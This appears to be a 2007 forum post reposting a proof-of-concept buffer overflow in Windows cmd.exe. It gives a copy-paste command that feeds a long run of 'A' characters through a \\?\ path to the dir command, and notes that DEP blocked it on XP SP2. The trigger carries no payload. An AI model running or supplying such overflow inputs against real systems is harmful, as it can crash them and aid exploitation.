Windows Command Processor CMD.EXE Buffer Overflow

Started by insanity, 01 de January , 2007, 08:20:30 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

insanity

01 de January , 2007, 08:20:30 PM
Author: Gregory R. Panakka
Execute the following line in cmd.exe (copy-paste)..
tested on winxp sp2 (fully patched) on 2006/10/06/17.56

Code Select
%COMSPEC% /K "dir \\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

(260 characters of 'A's)

Well, DEP (Data Execution Protection) comes into the picture and saves the day (???).

Haven't tried in Windows 2000 or Windows XP SP1 (or rather any other operating system).

Here are some screenshots....



Print
Go Up Pages1
User actions